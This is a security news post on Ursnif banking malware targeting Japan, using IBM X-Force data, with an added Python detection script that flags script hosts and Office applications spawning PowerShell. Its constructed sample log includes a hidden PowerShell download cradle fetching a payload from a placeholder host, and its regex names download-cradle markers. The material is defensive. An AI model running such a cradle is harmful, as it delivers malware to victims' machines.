Capsule:
- Japan has become the Ursnif banking malware's primary target.
- It targets credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites, in addition to banking credentials.
- The attack tactics seen were data grabbing from secure sessions, web injection attacks and page redirection.
- Ursnif uses a macro evasion technique that launches PowerShell only after the user closes the malicious file, which helps the malware evade sandbox detection, according to Limor Kessem, executive security advisor at IBM.

News in Details:

The Ursnif banking malware (also known as Gozi) has made Japan its primary target, according to data released by IBM X-Force. Ursnif was the most active malware code in the financial sector in 2016 and has maintained that position through 2017, the X-Force report said. The banking trojan was seen targeting North America, Europe and Australia as well as Japan, but the data show that Japanese banks were among the most popular Ursnif targets in 2017. The variant active in Japan was seen going after user credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites in addition to banking credentials. According to the X-Force report, the tactics used against Japanese users were data grabbing from secure sessions and web injection attacks; page redirection was also seen in some cases.

Ursnif usually uses malspam and exploit kits to deliver its payloads, and in the recent campaigns against Japanese banks malspam was the delivery method. An email pretending to come from a financial service either carries a fake attachment or contains an HTML link which, when clicked, downloads a zip file containing a JavaScript file. The JavaScript launches a PowerShell script that downloads the payload from a remote server. Limor Kessem, executive security advisor at IBM, said the most recent Ursnif variant uses a macro evasion technique that launches PowerShell only after the user closes the malicious file, which helps the malware evade sandbox detection.

"X-Force data revealed that campaign email spikes take place in cyclical weekly rounds, usually peaking on Tuesday evenings. Attempted infections peak on Thursdays and Fridays and are relatively low during the weekend and early weekdays," said Kessem.

The figure below lists the most-seen banking malware families in 2017 by attack volume:
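The delivery chain above gives defenders two process relationships worth alerting on: a Windows script host (the JavaScript dropped from the zip) spawning PowerShell with a download cradle, and an Office application spawning PowerShell (the macro stage). The close-triggered macro defeats a sandbox that opens the document and waits, but it still produces a process-creation event on the endpoint when it finally fires. The following is an added example, not code from the article or from IBM X-Force. It assumes Sysmon Event ID 1-style fields (ParentImage, Image, CommandLine), a pipe-delimited record format and a set of download-cradle markers that are all invented for this illustration, and runs over constructed sample records rather than real telemetry.

```python
"""Detection logic for the two process chains in the Ursnif delivery path,
run over constructed Sysmon-style process-creation records.
This is an added example, not code from the article or IBM X-Force.

Chain A: a Windows script host (wscript.exe / cscript.exe) spawns
         powershell.exe with a download cradle  -> the JavaScript-in-zip stage.
Chain B: an Office application spawns powershell.exe -> the macro stage. The
         macro fires only when the document is closed, so a sandbox that never
         closes the file sees nothing; process-creation telemetry on the
         endpoint records the spawn whenever it happens.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Markers of a PowerShell download cradle (assumed list; extend as needed).
CRADLE_RE = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|net\.webclient|https?://)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 fields this example needs."""
    ts: str
    parent_image: str
    image: str
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed 'ts|ParentImage|Image|CommandLine' record."""
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts, parent, image, cmdline)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles / and \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a detection name for the event, or None if it is not suspicious."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if child not in SHELLS:
        return None
    if parent in SCRIPT_HOSTS and CRADLE_RE.search(ev.cmdline):
        return "script-host-download-cradle"
    if parent in OFFICE_APPS:
        # Parent/child alone is enough here: Office spawning PowerShell is rare
        # in normal use, and timing (after document close) does not matter.
        return "office-spawned-powershell"
    return None


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Run classify() over raw records; return (timestamp, detection) pairs."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        name = classify(ev)
        if name:
            hits.append((ev.ts, name))
    return hits


# Constructed sample telemetry; paths, user name and URL are invented.
SAMPLE_LOG = [
    "2017-11-07T19:02:10|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|WINWORD.EXE /n invoice.doc",
    "2017-11-07T19:02:41|C:\\Windows\\System32\\wscript.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.bin','C:\\Users\\u\\AppData\\Local\\Temp\\p.exe')",
    "2017-11-07T19:05:03|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -ep bypass -w hidden -File C:\\Users\\u\\AppData\\Local\\Temp\\s.ps1",
    "2017-11-07T19:06:00|C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Get-Process",
    "2017-11-07T19:07:15|C:\\Windows\\System32\\wscript.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Get-Date",
]

if __name__ == "__main__":
    for ts, name in detect(SAMPLE_LOG):
        print(ts, name)
```

Running the block flags only the second and third records: the script host launching a cradle, and Word launching PowerShell. The benign Word launch, the service-hosted PowerShell and the script host running a harmless cmdlet are left alone, which is the trade-off the cradle check buys for chain A; for chain B the parent/child pair alone is treated as enough, since Office spawning PowerShell is unusual in normal use.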

About the Author
Ashique is a self-motivated and passionate security analyst with good knowledge of computer networking, security analysis, vulnerability assessment and penetration testing.